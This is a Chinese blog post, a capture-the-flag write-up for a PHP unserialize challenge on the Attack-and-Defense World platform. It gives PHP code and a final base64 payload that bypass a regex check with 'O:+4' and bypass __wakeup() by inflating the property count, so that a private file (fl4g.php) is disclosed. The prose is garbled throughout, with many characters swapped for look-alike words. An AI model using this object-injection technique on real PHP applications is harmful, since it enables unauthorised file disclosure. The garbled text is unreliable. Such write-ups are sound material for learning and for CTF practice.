关于php:php安全攻防世界unserialize函数反序列化示例详解

这篇文章次要介绍了php的平安防护，对于攻防世界Web php unserialize正则表达式反序列化示例详解，有须要的敌人能够借鉴参考下，心愿可能有所帮忙

步骤
首先关上题目，发现给了一段源码：

剖析源码，发现类外面有三个魔术办法：

__construct()：构造函数，对类的变量进行初始化，创立时主动调用，用失去的参数笼罩$file

__destruct()：销毁时调用，会显示文件的代码，这里要显示fl4g.php

__wakeup()：在进行反序列化之前会调用，会把$file重置成index.php

正则表达式的含意：o或c结尾，冒号，一个或多个数字，不辨别大小写

ok，剖析结束：咱们要将序列化后的字符串进行base64加密之后进行get传参到var变量即可
然而这里咱们能够看出须要绕过__wakeup()函数以及正则匹配，才可能拿到flag

__wakeup()办法绕过办法：当成员属性的数目大于理论数目的时候即可绕过此办法

正则匹配咱们能够应用+来进行绕过

代码：

<?phpclass Demo {     private $file = 'index.php';    public function __construct($file) {         $this->file = $file;     }    function __destruct() {         echo @highlight_file($this->file, true);     }    function __wakeup() {         if ($this->file != 'index.php') {             //the secret is in the fl4g.php            $this->file = 'index.php';         }     } }$a = new Demo("fl4g.php");// 传入咱们须要显示的文件$b = serialize($a);// 进行序列化echo $b;// O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}$b = str_replace("O:4", "O:+4", $b);// 绕过正则匹配$b = str_replace("1:{","2:{",$b);// 绕过__wakeup()办法echo base64_encode($b);// 进行base64编码并输入?>

payload：var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

胜利拿到flag~

留神：这里有个坑，要是间接将序列化之后的字符串进行手动批改再去找在线网站进行加密则会发现编码之后和咱们payload里的不太一样

这是因为file变量为公有变量，所以序列化之后的字符串结尾和结尾各有一个空白字符，而咱们在对序列化之后的字符串进行输入时，浏览器则不显示空字符，如图：

仔细的敌人也会发现Demofile只有8个字符，而长度却显示10。

所以正确的序列化字符串应该是

O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}

而咱们因为是应用php代码间接进行编码的，全自动化，天然不会漏掉空字符。

解释一下php序列化字符串的格局：

首先对象类型分为以下几种

a - array b - boolean
d - double i - integer
o - common object r - reference
s - string C - custom object
O - class N - null
R - pointer reference U - unicode string

格局：对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

总结
考查对php中魔术办法的相熟水平，以及反序列化的利用